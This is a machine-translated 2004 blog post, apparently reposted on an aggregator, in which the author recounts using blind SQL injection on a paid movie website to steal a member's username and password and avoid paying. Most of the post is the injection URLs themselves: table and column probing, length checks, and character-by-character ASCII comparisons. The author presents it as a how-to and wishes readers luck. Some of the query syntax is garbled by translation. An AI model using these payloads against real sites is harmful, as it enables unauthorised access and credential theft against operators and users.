2. Tech
  3. Successful SQL injection

Successful SQL injection

zhaozj2021-02-16  94

I want to watch movies today, I have been charged several movie websites. Pain, poor, helpless ... I want to get a user and password to see. I thought of SQL injection. Start with

http://www.xxx.com/movie.asp?id=126 and 1 = 1

I tried it didn't report an error. Haha. has hope. .

Then come back to http://www.xxx.com/movie.asp?id=126 and (select count (*) from user)> = 0 error. . . Explain that there is no User. . Try again. . I tried it in the middle, and the restriction of this http://www.xxx.com/movie.asp?id=126 and (select count (*) from users)> = 0 is successful. . Note There is a useers table in the library. . Next, the user and password field in the table. Use http://www.xxx.com/movie.asp?id=126 and (select count (user)> = 0 errors. . . I have tried N times in the middle. . Final http://www.xxx.com/movie.asp?id=126 and (Select Count (userid) from users "> = 0 is successful. . Then come again. . Also just get the username field. . The password field is successful. . http://www.xxx.com/movie.asp?id=126 and (Select Count (Password) from Users)> = 0

This has information. . Then guess the user name. . First get the length of the username. http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 LEN (Userid) from users> 0 Success http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 LEN (Userid)> 1 Success http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 LEN (UserID) from users> 2 Success HTTP: // Www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 LEN (UserID) from users> 3 Success http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 Len (userid)> 4 Success http://www.xxx.com/movie.asp?id=126 and (select top 1 len (userid) from users> 5 Success http://www.xxx. COM / MOVIE.ASP? ID = 126 and (SELECT TOP 1 LEN (userid) from users> 6 error

The length of the user name is determined from above. No matter whether his password is encrypted. . Get the user name and say. . Then come. .

http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 ASC ((UserID, 1, 1)) from users> 47 Success http://www.xxx.com/movie. ASP? ID = 126 and (SELECT TOP 1 ASC ((UserID, 1, 1)) from users> 57 Failed to derive the first bit of the username is a number. . The range of numbers is very easy. . http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 ASC ((UserID, 1, 1)) from users> 48 Success http://www.xxx.com/movie. ASP? ID = 126 and (SELECT TOP 1 ASC ((UserID, 1, 1)) from users> 49 Success http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 ASC ( (UserID, 1, 1)) from users> 50 Success http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 ASC ((UserID, 1, 1)) from users> 51 Success http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 ASC ((UserID, 1, 1)) from users> 52 Success http://www.xxx.com/ Movie.asp? id = 126 and (SELECT TOP 1 ASC ((UserID, 1, 1)) from users> 53 Success http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 ASC ((UserID, 1, 1)) from users> 54 Error This is the first bit 6. . Then the above. . Once I have been specifically ASC ((User, 6, 1)) a guessed user name. .

After that, the suspension has finally got a user name: 664306. This reduces a lot of steps to the suspect. . It's my luck.

The username will get the password. . Failed the password was encrypted by MD5. . So I didn't have much hope. Use Len to try it. If it is too long. . Guess the name of the user is a lot of progress to me. . Because more than 12 passwords are encrypted. This is not used in this way. .

http://www.xxx.com/movie.asp?id=126 and (SELECT TOP 1 LEN (Password) from users> 12 Error

The password is not greater than 12 bits. This may not be encrypted. So slowly reduce the numbers behind. . Last to http://www.xxx.com/movie.asp?id=126 and (Select Top 1 Len (Password) from users> 5 success

Is it 6 bits? Is the user and password. Ha ha. I tried it. Sure enough. . Get a gold member. .

The user and password have also reduced my many steps. .

If the user and password are different. . Just guess the user's method slowly guess the password. As long as its password is not encrypted. It will be able to get it. I wish my friends good luck. .

This is the first test result after the tutorial here. . Write it into a post to be here. . Express thanks to here. .

Please also give you a lot of younger brother. .

June 19, 2004 12:37 href = "http://dotnet.mblogger.cn/yefengwz/services/pingback.aspx" Rel = "pingback">

转载请注明原文地址:https://www.9cbs.com/read-12815.html

9cbs

New Post(0)